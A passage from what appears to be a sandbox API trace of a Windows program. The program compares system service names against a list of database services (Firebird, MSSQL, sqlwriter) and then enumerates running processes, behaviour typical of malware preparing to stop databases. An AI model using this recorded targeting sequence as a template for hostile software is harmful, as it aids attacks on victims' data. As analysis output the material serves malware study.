(lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0051.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0051.597] lstrlenW (lpString="iphlpsvc") returned 8 [0051.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0051.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0051.597] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0051.597] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0051.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0051.597] lstrlenW (lpString="KeyIso") returned 6 [0051.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0051.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0051.597] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0051.597] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0051.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0051.597] lstrlenW (lpString="LanmanServer") returned 12 [0051.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0051.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0051.597] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0051.597] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0051.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0051.597] lstrlenW (lpString="LanmanWorkstation") returned 17 [0051.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0051.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0051.597] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0051.597] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0051.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0051.597] lstrlenW (lpString="lfsvc") returned 5 [0051.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0051.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0051.598] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0051.598] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0051.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0051.598] lstrlenW (lpString="lmhosts") returned 7 [0051.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0051.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0051.598] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0051.598] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0051.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0051.598] lstrlenW (lpString="LSM") returned 3 [0051.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0051.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0051.598] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0051.598] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0051.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0051.598] lstrlenW (lpString="MpsSvc") returned 6 [0051.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0051.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0051.598] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0051.598] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0051.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0051.598] lstrlenW (lpString="NcbService") returned 10 [0051.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0051.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0051.598] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0051.598] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0051.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0051.598] lstrlenW (lpString="netprofm") returned 8 [0051.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0051.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0051.598] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0051.598] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0051.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0051.598] lstrlenW (lpString="NlaSvc") returned 6 [0051.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0051.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0051.599] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0051.599] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0051.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0051.599] lstrlenW (lpString="nsi") returned 3 [0051.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0051.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0051.599] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0051.599] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0051.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0051.599] lstrlenW (lpString="PcaSvc") returned 6 [0051.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0051.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0051.599] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0051.599] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0051.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0051.599] lstrlenW (lpString="PlugPlay") returned 8 [0051.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0051.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0051.599] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0051.599] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0051.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0051.599] lstrlenW (lpString="Power") returned 5 [0051.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0051.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0051.599] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0051.599] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0051.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0051.599] lstrlenW (lpString="ProfSvc") returned 7 [0051.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0051.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0051.599] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0051.599] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0051.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0051.599] lstrlenW (lpString="RpcEptMapper") returned 12 [0051.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0051.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0051.600] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0051.600] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0051.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0051.600] lstrlenW (lpString="RpcSs") returned 5 [0051.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0051.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0051.600] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0051.600] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0051.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0051.600] lstrlenW (lpString="SamSs") returned 5 [0051.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0051.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0051.600] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0051.600] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0051.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0051.600] lstrlenW (lpString="Schedule") returned 8 [0051.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0051.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0051.600] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0051.600] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0051.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0051.600] lstrlenW (lpString="SecurityHealthService") returned 21 [0051.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0051.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0051.600] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0051.600] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0051.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0051.600] lstrlenW (lpString="SENS") returned 4 [0051.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0051.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0051.600] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0051.600] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0051.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0051.600] lstrlenW (lpString="ShellHWDetection") returned 16 [0051.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0051.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0051.601] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0051.601] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0051.601] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0051.601] lstrlenW (lpString="Spooler") returned 7 [0051.601] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0051.601] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0051.601] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0051.601] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0051.601] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0051.601] lstrlenW (lpString="SSDPSRV") returned 7 [0051.601] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0051.601] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0051.601] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0051.601] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0051.601] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0051.601] lstrlenW (lpString="StateRepository") returned 15 [0051.601] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0051.601] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0051.601] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0051.601] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0051.601] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0051.601] lstrlenW (lpString="SysMain") returned 7 [0051.601] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0051.601] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0051.601] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0051.601] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0051.601] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0051.601] lstrlenW (lpString="SystemEventsBroker") returned 18 [0051.601] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0051.601] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0051.601] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0051.601] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0051.601] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x636198 | out: hHeap=0x5d0000) returned 1 [0051.601] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x324 [0051.605] Process32FirstW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0051.606] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0051.607] lstrlenW (lpString="System") returned 6 [0051.607] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0051.607] lstrlenW (lpString="smss.exe") returned 8 [0051.607] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0051.610] lstrlenW (lpString="csrss.exe") returned 9 [0051.610] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0051.611] lstrlenW (lpString="wininit.exe") returned 11 [0051.611] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0051.612] lstrlenW (lpString="csrss.exe") returned 9 [0051.612] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0051.612] lstrlenW (lpString="winlogon.exe") returned 12 [0051.612] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0051.613] lstrlenW (lpString="services.exe") returned 12 [0051.613] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0051.614] lstrlenW (lpString="lsass.exe") returned 9 [0051.614] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.614] lstrlenW (lpString="svchost.exe") returned 11 [0051.614] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0051.615] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0051.615] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0051.616] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0051.616] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.616] lstrlenW (lpString="svchost.exe") returned 11 [0051.616] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0051.617] lstrlenW (lpString="dwm.exe") returned 7 [0051.617] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.618] lstrlenW (lpString="svchost.exe") returned 11 [0051.618] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.618] lstrlenW (lpString="svchost.exe") returned 11 [0051.619] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.619] lstrlenW (lpString="svchost.exe") returned 11 [0051.619] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.620] lstrlenW (lpString="svchost.exe") returned 11 [0051.620] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.620] lstrlenW (lpString="svchost.exe") returned 11 [0051.620] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.621] lstrlenW (lpString="svchost.exe") returned 11 [0051.621] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.622] lstrlenW (lpString="svchost.exe") returned 11 [0051.622] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.622] lstrlenW (lpString="svchost.exe") returned 11 [0051.622] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.623] lstrlenW (lpString="svchost.exe") returned 11 [0051.623] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0051.624] lstrlenW (lpString="spoolsv.exe") returned 11 [0051.624] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.625] lstrlenW (lpString="svchost.exe") returned 11 [0051.625] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.625] lstrlenW (lpString="svchost.exe") returned 11 [0051.625] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0051.626] lstrlenW (lpString="audiodg.exe") returned 11 [0051.626] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0051.627] lstrlenW (lpString="sihost.exe") returned 10 [0051.627] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.627] lstrlenW (lpString="svchost.exe") returned 11 [0051.627] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0051.628] lstrlenW (lpString="taskhostw.exe") returned 13 [0051.628] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0051.629] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0051.629] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0051.629] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0051.629] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0051.630] lstrlenW (lpString="explorer.exe") returned 12 [0051.631] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0051.631] lstrlenW (lpString="Memory Compression") returned 18 [0051.631] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0051.632] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0051.632] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, 